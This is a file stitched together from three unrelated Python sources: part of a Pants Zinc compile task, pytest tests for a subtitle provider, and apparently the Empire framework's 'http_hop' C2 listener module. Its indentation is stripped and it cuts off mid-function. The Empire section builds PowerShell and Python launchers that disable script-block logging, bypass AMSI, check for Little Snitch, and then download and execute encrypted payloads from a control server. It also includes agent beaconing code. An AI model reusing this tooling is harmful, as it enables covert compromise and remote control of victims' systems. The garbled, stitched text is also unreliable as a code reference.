      raise TaskError('Zinc compile failed.')

  def _verify_zinc_classpath(self, classpath):
    # Rejects classpath entries that are relative, unnormalized, or outside
    # both the pants workdir and the JDK.
    def is_outside(path, putative_parent):
      return os.path.relpath(path, putative_parent).startswith(os.pardir)

    dist = self._zinc.dist
    for path in classpath:
      if not os.path.isabs(path):
        raise TaskError('Classpath entries provided to zinc should be absolute. '
                        '{} is not.'.format(path))

      if is_outside(path, self.get_options().pants_workdir) and is_outside(path, dist.home):
        raise TaskError('Classpath entries provided to zinc should be in working directory or '
                        'part of the JDK. {} is not.'.format(path))
      if path != os.path.normpath(path):
        raise TaskError('Classpath entries provided to zinc should be normalized '
                        '(i.e. without ".." and "."). {} is not.'.format(path))

  def log_zinc_file(self, analysis_file):
    self.context.log.debug('Calling zinc on: {} ({})'
                           .format(analysis_file,
                                   hash_file(analysis_file).upper()
                                   if os.path.exists(analysis_file)
                                   else 'nonexistent'))

  @classmethod
  def _javac_plugin_args(cls, javac_plugin_map):
    # Formats -C-Xplugin flags; validates args contain no spaces, since javac
    # cannot escape them.
    ret = []
    for plugin, args in javac_plugin_map.items():
      for arg in args:
        if ' ' in arg:
          # Note: Args are separated by spaces, and there is no way to escape embedded spaces, as
          # javac's Main does a simple split on these strings.
          raise TaskError('javac plugin args must not contain spaces '
                          '(arg {} for plugin {})'.format(arg, plugin))
      ret.append('-C-Xplugin:{} {}'.format(plugin, ' '.join(args)))
    return ret

  def _scalac_plugin_args(self, scalac_plugin_map, classpath):
    if not scalac_plugin_map:
      return []

    plugin_jar_map = self._find_scalac_plugins(scalac_plugin_map.keys(), classpath)
    ret = []
    for name, cp_entries in plugin_jar_map.items():
      # Note that the first element in cp_entries is the one containing the plugin's metadata,
      # meaning that this is the plugin that will be loaded, even if there happen to be other
      # plugins in the list of entries (e.g., because this plugin depends on another plugin).
      ret.append('-S-Xplugin:{}'.format(':'.join(cp_entries)))
      for arg in scalac_plugin_map[name]:
        ret.append('-S-P:{}:{}'.format(name, arg))
    return ret

  def _find_scalac_plugins(self, scalac_plugins, classpath):
    """Returns a map from plugin name to list of plugin classpath entries.

    The first entry in each list is the classpath entry containing the plugin metadata.
    The rest are the internal transitive deps of the plugin.

    This allows us to have in-repo plugins with dependencies (unlike javac, scalac doesn't load
    plugins or their deps from the regular classpath, so we have to provide these entries
    separately, in the -Xplugin: flag).

    Note that we don't currently support external plugins with dependencies, as we can't know which
    external classpath elements are required, and we'd have to put the entire external classpath
    on each -Xplugin: flag, which seems excessive.
    Instead, external plugins should be published as "fat jars" (which appears to be the norm,
    since SBT doesn't support plugins with dependencies anyway).
    """
    # Allow multiple flags and also comma-separated values in a single flag.
    plugin_names = set([p for val in scalac_plugins for p in val.split(',')])
    if not plugin_names:
      return {}

    active_plugins = {}
    buildroot = get_buildroot()

    cp_product = self.context.products.get_data('runtime_classpath')
    for classpath_element in classpath:
      name = self._maybe_get_plugin_name(classpath_element)
      if name in plugin_names:
        plugin_target_closure = self._plugin_targets('scalac').get(name, [])
        # It's important to use relative paths, as the compiler flags get embedded in the zinc
        # analysis file, and we port those between systems via the artifact cache.
        rel_classpath_elements = [
          os.path.relpath(cpe, buildroot) for cpe in
          ClasspathUtil.internal_classpath(plugin_target_closure, cp_product, self._confs)]
        # If the plugin is external then rel_classpath_elements will be empty, so we take
        # just the external jar itself.
        rel_classpath_elements = rel_classpath_elements or [classpath_element]
        # Some classpath elements may be repeated, so we allow for that here.
        if active_plugins.get(name, rel_classpath_elements) != rel_classpath_elements:
          raise TaskError('Plugin {} defined in {} and in {}'.format(name, active_plugins[name],
                                                                     classpath_element))
        active_plugins[name] = rel_classpath_elements
        if len(active_plugins) == len(plugin_names):
          # We've found all the plugins, so return now to spare us from processing
          # of the rest of the classpath for no reason.
          return active_plugins

    # If we get here we must have unresolved plugins.
    unresolved_plugins = plugin_names - set(active_plugins.keys())
    raise TaskError('Could not find requested plugins: {}'.format(list(unresolved_plugins)))

  @classmethod
  @memoized_method
  def _maybe_get_plugin_name(cls, classpath_element):
    """If classpath_element is a scalac plugin, returns its name.

    Returns None otherwise.
    """
    def process_info_file(cp_elem, info_file):
      # Parses scalac-plugin.xml and extracts the <name> element.
      plugin_info = ElementTree.parse(info_file).getroot()
      if plugin_info.tag != 'plugin':
        raise TaskError('File {} in {} is not a valid scalac plugin descriptor'.format(
            _SCALAC_PLUGIN_INFO_FILE, cp_elem))
      return plugin_info.find('name').text

    if os.path.isdir(classpath_element):
      try:
        with open(os.path.join(classpath_element, _SCALAC_PLUGIN_INFO_FILE)) as plugin_info_file:
          return process_info_file(classpath_element, plugin_info_file)
      except IOError as e:
        # Missing descriptor simply means "not a plugin"; other IO errors
        # are real failures.
        if e.errno != errno.ENOENT:
          raise
    else:
      with open_zip(classpath_element, 'r') as jarfile:
        try:
          with closing(jarfile.open(_SCALAC_PLUGIN_INFO_FILE, 'r')) as plugin_info_file:
            return process_info_file(classpath_element, plugin_info_file)
        except KeyError:
          # Jar has no descriptor entry: not a plugin.
          pass
    return None
class ZincCompile(BaseZincCompile):
  """Compile Scala and Java code to classfiles using Zinc."""

  @classmethod
  def register_options(cls, register):
    # All plugin options below are deprecated shims; see each removal_hint
    # for the replacement under the java/scala subsystem scopes.
    super(ZincCompile, cls).register_options(register)
    register('--javac-plugins', advanced=True, type=list, fingerprint=True,
             removal_version='1.9.0.dev0',
             removal_hint='Use `--java-javac-plugins` instead.',
             help='Use these javac plugins.')
    register('--javac-plugin-args', advanced=True, type=dict, default={}, fingerprint=True,
             removal_version='1.9.0.dev0',
             removal_hint='Use `--java-javac-plugin-args` instead.',
             help='Map from javac plugin name to list of arguments for that plugin.')
    cls.register_jvm_tool(register, 'javac-plugin-dep', classpath=[],
                          removal_version='1.9.0.dev0',
                          removal_hint='Use `--java-javac-plugin-dep` instead.',
                          help='Search for javac plugins here, as well as in any '
                               'explicit dependencies.')
    register('--scalac-plugins', advanced=True, type=list, fingerprint=True,
             removal_version='1.9.0.dev0',
             removal_hint='Use `--scala-scalac-plugins` instead.',
             help='Use these scalac plugins.')
    register('--scalac-plugin-args', advanced=True, type=dict, default={}, fingerprint=True,
             removal_version='1.9.0.dev0',
             removal_hint='Use `--scala-scalac-plugin-args` instead.',
             help='Map from scalac plugin name to list of arguments for that plugin.')
    cls.register_jvm_tool(register, 'scalac-plugin-dep', classpath=[],
                          removal_version='1.9.0.dev0',
                          removal_hint='Use `--scala-scalac-plugin-dep` instead.',
                          help='Search for scalac plugins here, as well as in any '
                               'explicit dependencies.')

  @classmethod
  def product_types(cls):
    # Products this task can provide to downstream tasks.
    return ['runtime_classpath', 'zinc_analysis', 'zinc_args']

  def select(self, target):
    # Require that targets are marked for JVM compilation, to differentiate from
    # targets owned by the scalajs contrib module.
    if not isinstance(target, JvmTarget):
      return False
    return target.has_sources('.java') or target.has_sources('.scala')

  def select_source(self, source_file_path):
    # Zinc compiles only Java and Scala sources.
    return source_file_path.endswith('.java') or source_file_path.endswith('.scala')

  def execute(self):
    # No-op (implicitly returns None) unless zinc is the configured compiler.
    if JvmPlatform.global_instance().get_options().compiler == 'zinc':
      return super(ZincCompile, self).execute()
| |
# -*- coding: utf-8 -*-
import os
from babelfish import Language, language_converters
import pytest
from vcr import VCR
from subliminal.providers.tvsubtitles import TVsubtitlesProvider, TVsubtitlesSubtitle
# Shared VCR fixture config for the tvsubtitles cassettes.
# NOTE: the original wrapped the cassette dir in os.path.realpath twice;
# realpath is idempotent, so a single call is equivalent.
vcr = VCR(path_transformer=lambda path: path + '.yaml',
          record_mode=os.environ.get('VCR_RECORD_MODE', 'once'),
          match_on=['method', 'scheme', 'host', 'port', 'path', 'query', 'body'],
          cassette_library_dir=os.path.realpath(os.path.join('tests', 'cassettes', 'tvsubtitles')))
@pytest.mark.converter
def test_converter_convert_alpha3_country():
    """alpha3 + country code converts to the tvsubtitles site code."""
    converter = language_converters['tvsubtitles']
    assert converter.convert('por', 'BR') == 'br'
@pytest.mark.converter
def test_converter_convert_alpha3():
    """A plain alpha3 code converts to the tvsubtitles site code."""
    converter = language_converters['tvsubtitles']
    assert converter.convert('ukr') == 'ua'
@pytest.mark.converter
def test_converter_convert_alpha3_alpha2_converter():
    """Codes covered by the alpha2 fallback also convert."""
    converter = language_converters['tvsubtitles']
    assert converter.convert('fra') == 'fr'
@pytest.mark.converter
def test_converter_reverse():
    """Reverse conversion yields an (alpha3,) tuple."""
    converter = language_converters['tvsubtitles']
    assert converter.reverse('gr') == ('ell',)
@pytest.mark.converter
def test_converter_reverse_name_converter():
    """Reverse conversion through the name converter yields a full tuple."""
    converter = language_converters['tvsubtitles']
    assert converter.reverse('en') == ('eng', None, None)
def test_get_matches_format_release_group(episodes):
    """Exact release group and source both match."""
    subtitle = TVsubtitlesSubtitle(Language('fra'), None, 249518, 'The Big Bang Theory', 7, 5, 2007, 'HDTV',
                                   'lol-dimension')
    expected = {'series', 'season', 'episode', 'year', 'country', 'source', 'release_group'}
    assert subtitle.get_matches(episodes['bbt_s07e05']) == expected
def test_get_matches_format_equivalent_release_group(episodes):
    """An equivalent release group still counts as a match."""
    subtitle = TVsubtitlesSubtitle(Language('fra'), None, 249518, 'The Big Bang Theory', 7, 5, 2007, 'HDTV',
                                   'lol')
    expected = {'series', 'season', 'episode', 'year', 'country', 'source', 'release_group'}
    assert subtitle.get_matches(episodes['bbt_s07e05']) == expected
def test_get_matches_video_codec_resolution(episodes):
    """Video codec and resolution embedded in the release string match."""
    subtitle = TVsubtitlesSubtitle(Language('por'), None, 261077, 'Game of Thrones', 3, 10, None, '720p.BluRay',
                                   'x264-DEMAND')
    expected = {'series', 'season', 'episode', 'year', 'country', 'video_codec', 'resolution'}
    assert subtitle.get_matches(episodes['got_s03e10']) == expected
def test_get_matches_only_year_country(episodes):
    """A wrong-series subtitle only matches on year/country."""
    subtitle = TVsubtitlesSubtitle(Language('por'), None, 261077, 'Game of Thrones', 3, 10, None, '1080p.BluRay',
                                   'DEMAND')
    assert subtitle.get_matches(episodes['bbt_s07e05']) == {'year', 'country'}
def test_get_matches_no_match(episodes):
    """A completely unrelated video yields no matches at all."""
    subtitle = TVsubtitlesSubtitle(Language('por'), None, 261077, 'Game of Thrones', 3, 10, 2011, '1080p.BluRay',
                                   'DEMAND')
    assert subtitle.get_matches(episodes['house_of_cards_us_s06e01']) == set()
@pytest.mark.integration
@vcr.use_cassette
def test_search_show_id():
    """A full series title resolves to its tvsubtitles show id."""
    with TVsubtitlesProvider() as provider:
        assert provider.search_show_id('The Big Bang Theory') == 154
@pytest.mark.integration
@vcr.use_cassette
def test_search_show_id_incomplete():
    """A truncated title does not resolve to a show id."""
    with TVsubtitlesProvider() as provider:
        assert provider.search_show_id('The Big Bang') is None
@pytest.mark.integration
@vcr.use_cassette
def test_search_show_id_ambiguous():
    """An ambiguous title still picks the expected show id."""
    with TVsubtitlesProvider() as provider:
        assert provider.search_show_id('New Girl') == 977
@pytest.mark.integration
@vcr.use_cassette
def test_search_show_id_us():
    """A year disambiguates the US series."""
    with TVsubtitlesProvider() as provider:
        assert provider.search_show_id('House of Cards', 2013) == 1246
@pytest.mark.integration
@vcr.use_cassette
def test_search_show_id_uk():
    """Without a year the UK series is found."""
    with TVsubtitlesProvider() as provider:
        assert provider.search_show_id('Beautiful People') == 657
@pytest.mark.integration
@vcr.use_cassette
def test_search_show_id_no_year():
    """No year given: the original series is returned."""
    with TVsubtitlesProvider() as provider:
        assert provider.search_show_id('Dallas') == 646
@pytest.mark.integration
@vcr.use_cassette
def test_search_show_id_year_in_title():
    """A year selects the remake whose title carries the year."""
    with TVsubtitlesProvider() as provider:
        assert provider.search_show_id('Dallas', 2012) == 1127
@pytest.mark.integration
@vcr.use_cassette
def test_search_show_id_error():
    """A nonsense title resolves to no show id."""
    with TVsubtitlesProvider() as provider:
        assert provider.search_show_id('The Big How I Met Your Mother') is None
@pytest.mark.integration
@vcr.use_cassette
def test_get_episode_ids():
    """Season 5 of show 154 maps every episode number to its page id."""
    expected_episode_ids = {1: 34274, 2: 34275, 3: 34276, 4: 34277, 5: 34849, 6: 34923, 7: 35022, 8: 35023, 9: 35436,
                            10: 35503, 11: 35887, 12: 36369, 13: 36513, 14: 36610, 15: 36718, 16: 36795, 17: 37152,
                            18: 37153, 19: 37407, 20: 37863, 21: 38218, 22: 38574, 23: 38686, 24: 38687}
    with TVsubtitlesProvider() as provider:
        assert provider.get_episode_ids(154, 5) == expected_episode_ids
@pytest.mark.integration
@vcr.use_cassette
def test_get_episode_ids_wrong_season():
    """A nonexistent season yields an empty mapping."""
    with TVsubtitlesProvider() as provider:
        assert not provider.get_episode_ids(154, 55)
@pytest.mark.integration
@vcr.use_cassette
def test_query(episodes):
    """Querying a known episode returns the expected subtitle ids."""
    video = episodes['bbt_s07e05']
    expected_ids = {268673, 249733, 249518, 249519, 249714, 32596, 249590, 249592, 249499, 261214}
    with TVsubtitlesProvider() as provider:
        show_id = provider.search_show_id(video.series, video.year)
        found = provider.query(show_id, video.series, video.season, video.episode, video.year)
        assert {subtitle.subtitle_id for subtitle in found} == expected_ids
@pytest.mark.integration
@vcr.use_cassette
def test_query_no_year(episodes):
    """Querying a series without a year still finds its subtitles."""
    video = episodes['dallas_s01e03']
    with TVsubtitlesProvider() as provider:
        show_id = provider.search_show_id(video.series, video.year)
        found = provider.query(show_id, video.series, video.season, video.episode, video.year)
        assert {subtitle.subtitle_id for subtitle in found} == {124753}
@pytest.mark.integration
@vcr.use_cassette
def test_query_wrong_series(episodes):
    """A mismatched show id / truncated title yields nothing."""
    video = episodes['bbt_s07e05']
    with TVsubtitlesProvider() as provider:
        assert not provider.query(155, video.series[:12], video.season, video.episode, video.year)
@pytest.mark.integration
@vcr.use_cassette
def test_query_wrong_episode(episodes):
    """A nonexistent episode number yields nothing."""
    video = episodes['bbt_s07e05']
    with TVsubtitlesProvider() as provider:
        show_id = provider.search_show_id(video.series, video.year)
        assert not provider.query(show_id, video.series, video.season, 55, video.year)
@pytest.mark.integration
@vcr.use_cassette
def test_list_subtitles(episodes):
    """Listing subtitles filters on the requested languages."""
    video = episodes['bbt_s07e05']
    languages = {Language('eng'), Language('fra')}
    with TVsubtitlesProvider() as provider:
        found = provider.list_subtitles(video, languages)
        assert {subtitle.subtitle_id for subtitle in found} == {249592, 249499, 32596, 249518}
        assert {subtitle.language for subtitle in found} == languages
        assert found[0].release == 'The Big Bang Theory 7x05 (HDTV.LOL)'
@pytest.mark.integration
@vcr.use_cassette
def test_download_subtitle(episodes):
    """A listed subtitle can be downloaded and validates."""
    video = episodes['bbt_s07e05']
    languages = {Language('eng'), Language('fra')}
    with TVsubtitlesProvider() as provider:
        first = provider.list_subtitles(video, languages)[0]
        provider.download_subtitle(first)
        assert first.content is not None
        assert first.is_valid() is True
@pytest.mark.integration
@vcr.use_cassette
def test_list_subtitles_episode_alternative_series(episodes):
    """An alternative series name still lists the expected subtitle."""
    video = episodes['turn_s03e01']
    languages = {Language('fra')}
    with TVsubtitlesProvider() as provider:
        found = provider.list_subtitles(video, languages)
        assert {subtitle.subtitle_id for subtitle in found} == {307588}
        assert {subtitle.language for subtitle in found} == languages
| |
import base64
import random
import os
import errno
# Empire imports
from lib.common import helpers
from lib.common import agents
from lib.common import encryption
from lib.common import packets
from lib.common import messages
class Listener:
    """
    HTTP[S] hop listener: generates PHP redirector files that forward agent
    GET/POST traffic through a hop server to an existing Empire listener.
    """

    def __init__(self, mainMenu, params=None):
        # `params` is accepted for interface compatibility with other listener
        # modules but is unused here.  The original mutable default ([]) was
        # replaced with None to avoid shared-state-across-instances bugs.

        # metadata displayed by the Empire UI
        self.info = {
            'Name': 'HTTP[S] Hop',
            'Author': ['@harmj0y'],
            'Description': ('Starts a http[s] listener (PowerShell or Python) that uses a GET/POST approach.'),
            'Category' : ('client_server'),
            'Comments': []
        }

        # any options needed by the stager, settable during runtime
        self.options = {
            # format:
            #   value_name : {description, required, default_value}
            'Name' : {
                'Description'   :   'Name for the listener.',
                'Required'      :   True,
                'Value'         :   'http_hop'
            },
            'RedirectListener' : {
                'Description'   :   'Existing listener to redirect the hop traffic to.',
                'Required'      :   True,
                'Value'         :   ''
            },
            'Launcher' : {
                'Description'   :   'Launcher string.',
                'Required'      :   True,
                'Value'         :   'powershell -noP -sta -w 1 -enc '
            },
            'RedirectStagingKey' : {
                'Description'   :   'The staging key for the redirect listener, extracted from RedirectListener automatically.',
                'Required'      :   False,
                'Value'         :   ''
            },
            'Host' : {
                'Description'   :   'Hostname/IP for staging.',
                'Required'      :   True,
                'Value'         :   ''
            },
            'Port' : {
                'Description'   :   'Port for the listener.',
                'Required'      :   True,
                'Value'         :   80
            },
            'DefaultProfile' : {
                'Description'   :   'Default communication profile for the agent, extracted from RedirectListener automatically.',
                'Required'      :   False,
                'Value'         :   ''
            },
            'OutFolder' : {
                'Description'   :   'Folder to output redirectors to.',
                'Required'      :   True,
                'Value'         :   '/tmp/http_hop/'
            },
            'SlackToken' : {
                'Description'   :   'Your SlackBot API token to communicate with your Slack instance.',
                'Required'      :   False,
                'Value'         :   ''
            },
            'SlackChannel' : {
                'Description'   :   'The Slack channel or DM that notifications will be sent to.',
                'Required'      :   False,
                'Value'         :   '#general'
            }
        }

        # required:
        self.mainMenu = mainMenu
        self.threads = {}
    # optional/specific for this module
def default_response(self):
"""
If there's a default response expected from the server that the client needs to ignore,
(i.e. a default HTTP page), put the generation here.
"""
return ''
def validate_options(self):
"""
Validate all options for this listener.
"""
for key in self.options:
if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''):
print helpers.color("[!] Option \"%s\" is required." % (key))
return False
return True
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default', proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='', listenerName=None):
"""
Generate a basic launcher for the specified listener.
"""
if not language:
print helpers.color('[!] listeners/http_hop generate_launcher(): no language specified!')
if listenerName and (listenerName in self.mainMenu.listeners.activeListeners):
# extract the set options for this instantiated listener
listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options']
host = listenerOptions['Host']['Value']
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['RedirectStagingKey']['Value']
profile = listenerOptions['DefaultProfile']['Value']
uris = [a for a in profile.split('|')[0].split(',')]
stage0 = random.choice(uris)
if language.startswith('po'):
# PowerShell
stager = '$ErrorActionPreference = \"SilentlyContinue\";'
if safeChecks.lower() == 'true':
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass
stager += helpers.randomize_capitalization("$GPF=[ref].Assembly.GetType(")
stager += "'System.Management.Automation.Utils'"
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(");If($GPF){$GPC=$GPF.GetValue($null);If($GPC")
stager += "['ScriptB'+'lockLogging']"
stager += helpers.randomize_capitalization("){$GPC")
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;"
stager += helpers.randomize_capitalization("$GPC")
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}"
stager += helpers.randomize_capitalization("$val=[Collections.Generic.Dictionary[string,System.Object]]::new();$val.Add")
stager += "('EnableScriptB'+'lockLogging',0);"
stager += helpers.randomize_capitalization("$val.Add")
stager += "('EnableScriptBlockInvocationLogging',0);"
stager += helpers.randomize_capitalization("$GPC")
stager += "['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']"
stager += helpers.randomize_capitalization("=$val}")
stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(")
stager += "'signatures','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
# @mattifestation's AMSI bypass
stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
stager += "'System.Management.Automation.AmsiUtils'"
stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
stager += "'amsiInitFailed','NonPublic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
stager += "};"
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;")
if userAgent.lower() == 'default':
userAgent = profile.split('|')[1]
stager += "$u='"+userAgent+"';"
if 'https' in host:
# allow for self-signed certificates for https connections
stager += "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
if userAgent.lower() != 'none' or proxy.lower() != 'none':
if userAgent.lower() != 'none':
stager += helpers.randomize_capitalization('$wc.Headers.Add(')
stager += "'User-Agent',$u);"
if proxy.lower() != 'none':
if proxy.lower() == 'default':
stager += helpers.randomize_capitalization("$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;")
else:
# TODO: implement form for other proxy
stager += helpers.randomize_capitalization("$proxy=New-Object Net.WebProxy;")
stager += helpers.randomize_capitalization("$proxy.Address = '"+ proxy.lower() +"';")
stager += helpers.randomize_capitalization("$wc.Proxy = $proxy;")
if proxyCreds.lower() == "default":
stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;")
else:
# TODO: implement form for other proxy credentials
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
domain = username.split('\\')[0]
usr = username.split('\\')[1]
stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"','"+domain+"');"
stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = $netcred;")
# TODO: reimplement stager retries?
# code to turn the key string into a byte array
stager += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(")
stager += "'%s');" % (stagingKey)
# this is the minimized RC4 stager code from rc4.ps1
stager += helpers.randomize_capitalization('$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};')
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL', meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
# add the RC4 packet to a cookie
stager += helpers.randomize_capitalization("$wc.Headers.Add(")
stager += "\"Cookie\",\"session=%s\");" % (b64RoutingPacket)
stager += "$ser='%s';$t='%s';" % (host, stage0)
stager += helpers.randomize_capitalization("$data=$WC.DownloadData($ser+$t);")
stager += helpers.randomize_capitalization("$iv=$data[0..3];$data=$data[4..$data.length];")
# decode everything and kick it over to IEX to kick off execution
stager += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX")
if obfuscate:
stager = helpers.obfuscate(self.mainMenu.installPath, stager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())):
return helpers.powershell_launcher(stager, launcher)
else:
# otherwise return the case-randomized stager
return stager
if language.startswith('py'):
# Python
launcherBase = 'import sys;'
if 'https' in host:
# monkey patch ssl woohooo
launcherBase += "import ssl;\nif hasattr(ssl, '_create_unverified_context'):ssl._create_default_https_context = ssl._create_unverified_context;\n"
try:
if safeChecks.lower() == 'true':
launcherBase += "import re, subprocess;"
launcherBase += "cmd = \"ps -ef | grep Little\ Snitch | grep -v grep\"\n"
launcherBase += "ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)\n"
launcherBase += "out = ps.stdout.read()\n"
launcherBase += "ps.stdout.close()\n"
launcherBase += "if re.search(\"Little Snitch\", out):\n"
launcherBase += " sys.exit()\n"
except Exception as e:
p = "[!] Error setting LittleSnitch in stagger: " + str(e)
print helpers.color(p, color='red')
if userAgent.lower() == 'default':
userAgent = profile.split('|')[1]
launcherBase += "o=__import__({2:'urllib2',3:'urllib.request'}[sys.version_info[0]],fromlist=['build_opener']).build_opener();"
launcherBase += "UA='%s';" % (userAgent)
launcherBase += "server='%s';t='%s';" % (host, stage0)
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='PYTHON', meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
# add the RC4 packet to a cookie
launcherBase += "o.addheaders=[('User-Agent',UA), (\"Cookie\", \"session=%s\")];\n" % (b64RoutingPacket)
launcherBase += "import urllib2\n"
if proxy.lower() != "none":
if proxy.lower() == "default":
launcherBase += "proxy = urllib2.ProxyHandler();\n"
else:
proto = proxy.Split(':')[0]
launcherBase += "proxy = urllib2.ProxyHandler({'"+proto+"':'"+proxy+"'});\n"
if proxyCreds != "none":
if proxyCreds == "default":
launcherBase += "o = urllib2.build_opener(proxy);\n"
else:
launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n"
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
launcherBase += "proxy_auth_handler.add_password(None,'"+proxy+"','"+username+"','"+password+"');\n"
launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n"
else:
launcherBase += "o = urllib2.build_opener(proxy);\n"
else:
launcherBase += "o = urllib2.build_opener();\n"
#install proxy and creds globally, so they can be used with urlopen.
launcherBase += "urllib2.install_opener(o);\n"
# download the stager and extract the IV
launcherBase += "a=o.open(server+t).read();"
launcherBase += "IV=a[0:4];"
launcherBase += "data=a[4:];"
launcherBase += "key=IV+'%s';" % (stagingKey)
# RC4 decryption
launcherBase += "S,j,out=range(256),0,[]\n"
launcherBase += "for i in range(256):\n"
launcherBase += " j=(j+S[i]+ord(key[i%len(key)]))%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += "i=j=0\n"
launcherBase += "for char in data:\n"
launcherBase += " i=(i+1)%256\n"
launcherBase += " j=(j+S[i])%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += " out.append(chr(ord(char)^S[(S[i]+S[j])%256]))\n"
launcherBase += "exec(''.join(out))"
if encode:
launchEncoded = base64.b64encode(launcherBase)
launcher = "echo \"import sys,base64;exec(base64.b64decode('%s'));\" | /usr/bin/python &" % (launchEncoded)
return launcher
else:
return launcherBase
else:
print helpers.color("[!] listeners/http_hop generate_launcher(): invalid language specification: only 'powershell' and 'python' are current supported for this module.")
else:
print helpers.color("[!] listeners/http_hop generate_launcher(): invalid listener name specification!")
def generate_stager(self, listenerOptions, encode=False, encrypt=True, obfuscate=False, obfuscationCommand="", language=None):
"""
If you want to support staging for the listener module, generate_stager must be
implemented to return the stage1 key-negotiation stager code.
"""
print helpers.color("[!] generate_stager() not implemented for listeners/http_hop")
return ''
def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand=""):
"""
If you want to support staging for the listener module, generate_agent must be
implemented to return the actual staged agent code.
"""
print helpers.color("[!] generate_agent() not implemented for listeners/http_hop")
return ''
    def generate_comms(self, listenerOptions, language=None):
        """
        Generate just the agent communication code block needed for communications with this listener.
        This is so agents can easily be dynamically updated for the new listener.

        Returns the PowerShell or Python comms source as a string, or None
        (after printing an error) for a missing/unsupported language.
        """
        if language:
            if language.lower() == 'powershell':
                # Point the agent at this hop's host.
                updateServers = """
                    $Script:ControlServers = @("%s");
                    $Script:ServerIndex = 0;
                """ % (listenerOptions['Host']['Value'])
                # GET a tasking from a random task URI, with the routing
                # packet carried in the session cookie.
                getTask = """
                    function script:Get-Task {
                        try {
                            if ($Script:ControlServers[$Script:ServerIndex].StartsWith("http")) {
                                # meta 'TASKING_REQUEST' : 4
                                $RoutingPacket = New-RoutingPacket -EncData $Null -Meta 4
                                $RoutingCookie = [Convert]::ToBase64String($RoutingPacket)

                                # build the web request object
                                $wc = New-Object System.Net.WebClient

                                # set the proxy settings for the WC to be the default system settings
                                $wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
                                $wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
                                $wc.Headers.Add("User-Agent",$script:UserAgent)
                                $script:Headers.GetEnumerator() | % {$wc.Headers.Add($_.Name, $_.Value)}
                                $wc.Headers.Add("Cookie", "session=$RoutingCookie")

                                # choose a random valid URI for checkin
                                $taskURI = $script:TaskURIs | Get-Random
                                $result = $wc.DownloadData($Script:ControlServers[$Script:ServerIndex] + $taskURI)
                                $result
                            }
                        }
                        catch [Net.WebException] {
                            $script:MissedCheckins += 1
                            if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
                                # restart key negotiation
                                Start-Negotiate -S "$ser" -SK $SK -UA $ua
                            }
                        }
                    }
                """
                # POST results back, RC4-wrapped in a routing packet.
                sendMessage = """
                    function script:Send-Message {
                        param($Packets)

                        if($Packets) {
                            # build and encrypt the response packet
                            $EncBytes = Encrypt-Bytes $Packets

                            # build the top level RC4 "routing packet"
                            # meta 'RESULT_POST' : 5
                            $RoutingPacket = New-RoutingPacket -EncData $EncBytes -Meta 5

                            if($Script:ControlServers[$Script:ServerIndex].StartsWith('http')) {
                                # build the web request object
                                $wc = New-Object System.Net.WebClient

                                # set the proxy settings for the WC to be the default system settings
                                $wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
                                $wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
                                $wc.Headers.Add('User-Agent', $Script:UserAgent)
                                $Script:Headers.GetEnumerator() | ForEach-Object {$wc.Headers.Add($_.Name, $_.Value)}

                                try {
                                    # get a random posting URI
                                    $taskURI = $Script:TaskURIs | Get-Random
